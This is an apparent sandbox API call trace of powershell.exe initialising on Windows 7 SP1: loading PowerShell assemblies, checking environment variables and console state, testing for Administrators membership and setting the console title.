	[0258.556] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.561] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0258.996] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0258.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.996] CoTaskMemFree (pv=0x3298d0) 
	[0260.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0260.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0260.912] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0260.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.912] CoTaskMemFree (pv=0x3299e0) 
	[0260.913] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0260.913] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0260.913] CoTaskMemFree (pv=0x3299e0) 
	[0261.189] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0261.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.189] CoTaskMemFree (pv=0x3299e0) 
	[0261.189] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0261.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.189] CoTaskMemFree (pv=0x3299e0) 
	[0261.190] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0261.190] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.190] CoTaskMemFree (pv=0x3299e0) 
	[0261.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0261.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0261.827] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0261.828] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.828] CoTaskMemFree (pv=0x3299e0) 
	[0261.830] CoTaskMemAlloc (cb=0x104) returned 0x3299e0
	[0261.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3299e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0261.830] CoTaskMemFree (pv=0x3299e0) 
	[0262.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0262.799] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0266.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0266.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0268.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.016] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0268.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0268.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0270.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0270.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0270.277] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0270.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.277] CoTaskMemFree (pv=0x329c00) 
	[0270.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0270.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0271.000] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1ad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0271.000] SetErrorMode (uMode=0x1) returned 0x1
	[0271.001] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1ad9a0 | out: lpFileInformation=0x1ad9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0271.001] SetErrorMode (uMode=0x1) returned 0x1
	[0274.060] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.061] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.063] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0274.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0274.063] CoTaskMemFree (pv=0x329c00) 
	[0274.067] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0274.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0274.067] CoTaskMemFree (pv=0x329c00) 
	[0274.067] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0274.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0274.067] CoTaskMemFree (pv=0x329c00) 
	[0274.070] CoCreateGuid (in: pguid=0x1add68 | out: pguid=0x1add68*(Data1=0xa82d8803, Data2=0x21c1, Data3=0x4844, Data4=([0]=0xb7, [1]=0xa7, [2]=0x70, [3]=0x38, [4]=0xa8, [5]=0x25, [6]=0x18, [7]=0xc9))) returned 0x0
	[0274.073] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0274.074] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0274.074] CoTaskMemFree (pv=0x329c00) 
	[0274.077] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0274.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0274.077] CoTaskMemFree (pv=0x329c00) 
	[0274.079] CoTaskMemAlloc (cb=0x104) returned 0x329c00
	[0274.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x329c00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0274.080] CoTaskMemFree (pv=0x329c00) 
	[0274.086] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0274.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1ada10 | out: lpConsoleScreenBufferInfo=0x1ada10) returned 1
	[0274.540] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0274.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1ada10 | out: lpConsoleScreenBufferInfo=0x1ada10) returned 1
	[0274.541] GetVersionExW (in: lpVersionInformation=0x1ad9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0274.544] GetCurrentProcess () returned 0xffffffffffffffff
	[0274.545] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1ada38 | out: TokenHandle=0x1ada38*=0x31c) returned 1
	[0274.548] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad958 | out: TokenInformation=0x0, ReturnLength=0x1ad958) returned 0
	[0274.549] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x337290
	[0274.549] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x337290, TokenInformationLength=0x4, ReturnLength=0x1ad958 | out: TokenInformation=0x337290, ReturnLength=0x1ad958) returned 1
	[0274.550] DuplicateTokenEx (in: hExistingToken=0x31c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1adab8 | out: phNewToken=0x1adab8*=0x318) returned 1
	[0274.550] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ad958 | out: TokenInformation=0x0, ReturnLength=0x1ad958) returned 0
	[0274.551] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3372c0
	[0274.551] GetTokenInformation (in: TokenHandle=0x31c, TokenInformationClass=0x8, TokenInformation=0x3372c0, TokenInformationLength=0x4, ReturnLength=0x1ad958 | out: TokenInformation=0x3372c0, ReturnLength=0x1ad958) returned 1
	[0274.551] CheckTokenMembership (in: TokenHandle=0x318, SidToCheck=0x2d3df10*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1adac8 | out: IsMember=0x1adac8) returned 1
	[0274.552] CloseHandle (hObject=0x318) returned 1
	[0274.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.571] CoTaskMemAlloc (cb=0x804) returned 0x1b6f8c10
	[0274.571] GetConsoleTitleW (in: lpConsoleTitle=0x1b6f8c10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0274.986] CoTaskMemFree (pv=0x1b6f8c10) 
	[0274.997] CoTaskMemAlloc (cb=0x804) returned 0x1b6f94c0
	[0274.997] GetConsoleTitleW (in: lpConsoleTitle=0x1b6f94c0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0274.997] CoTaskMemFree (pv=0x1b6f94c0) 
	[0274.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.000] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0275.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
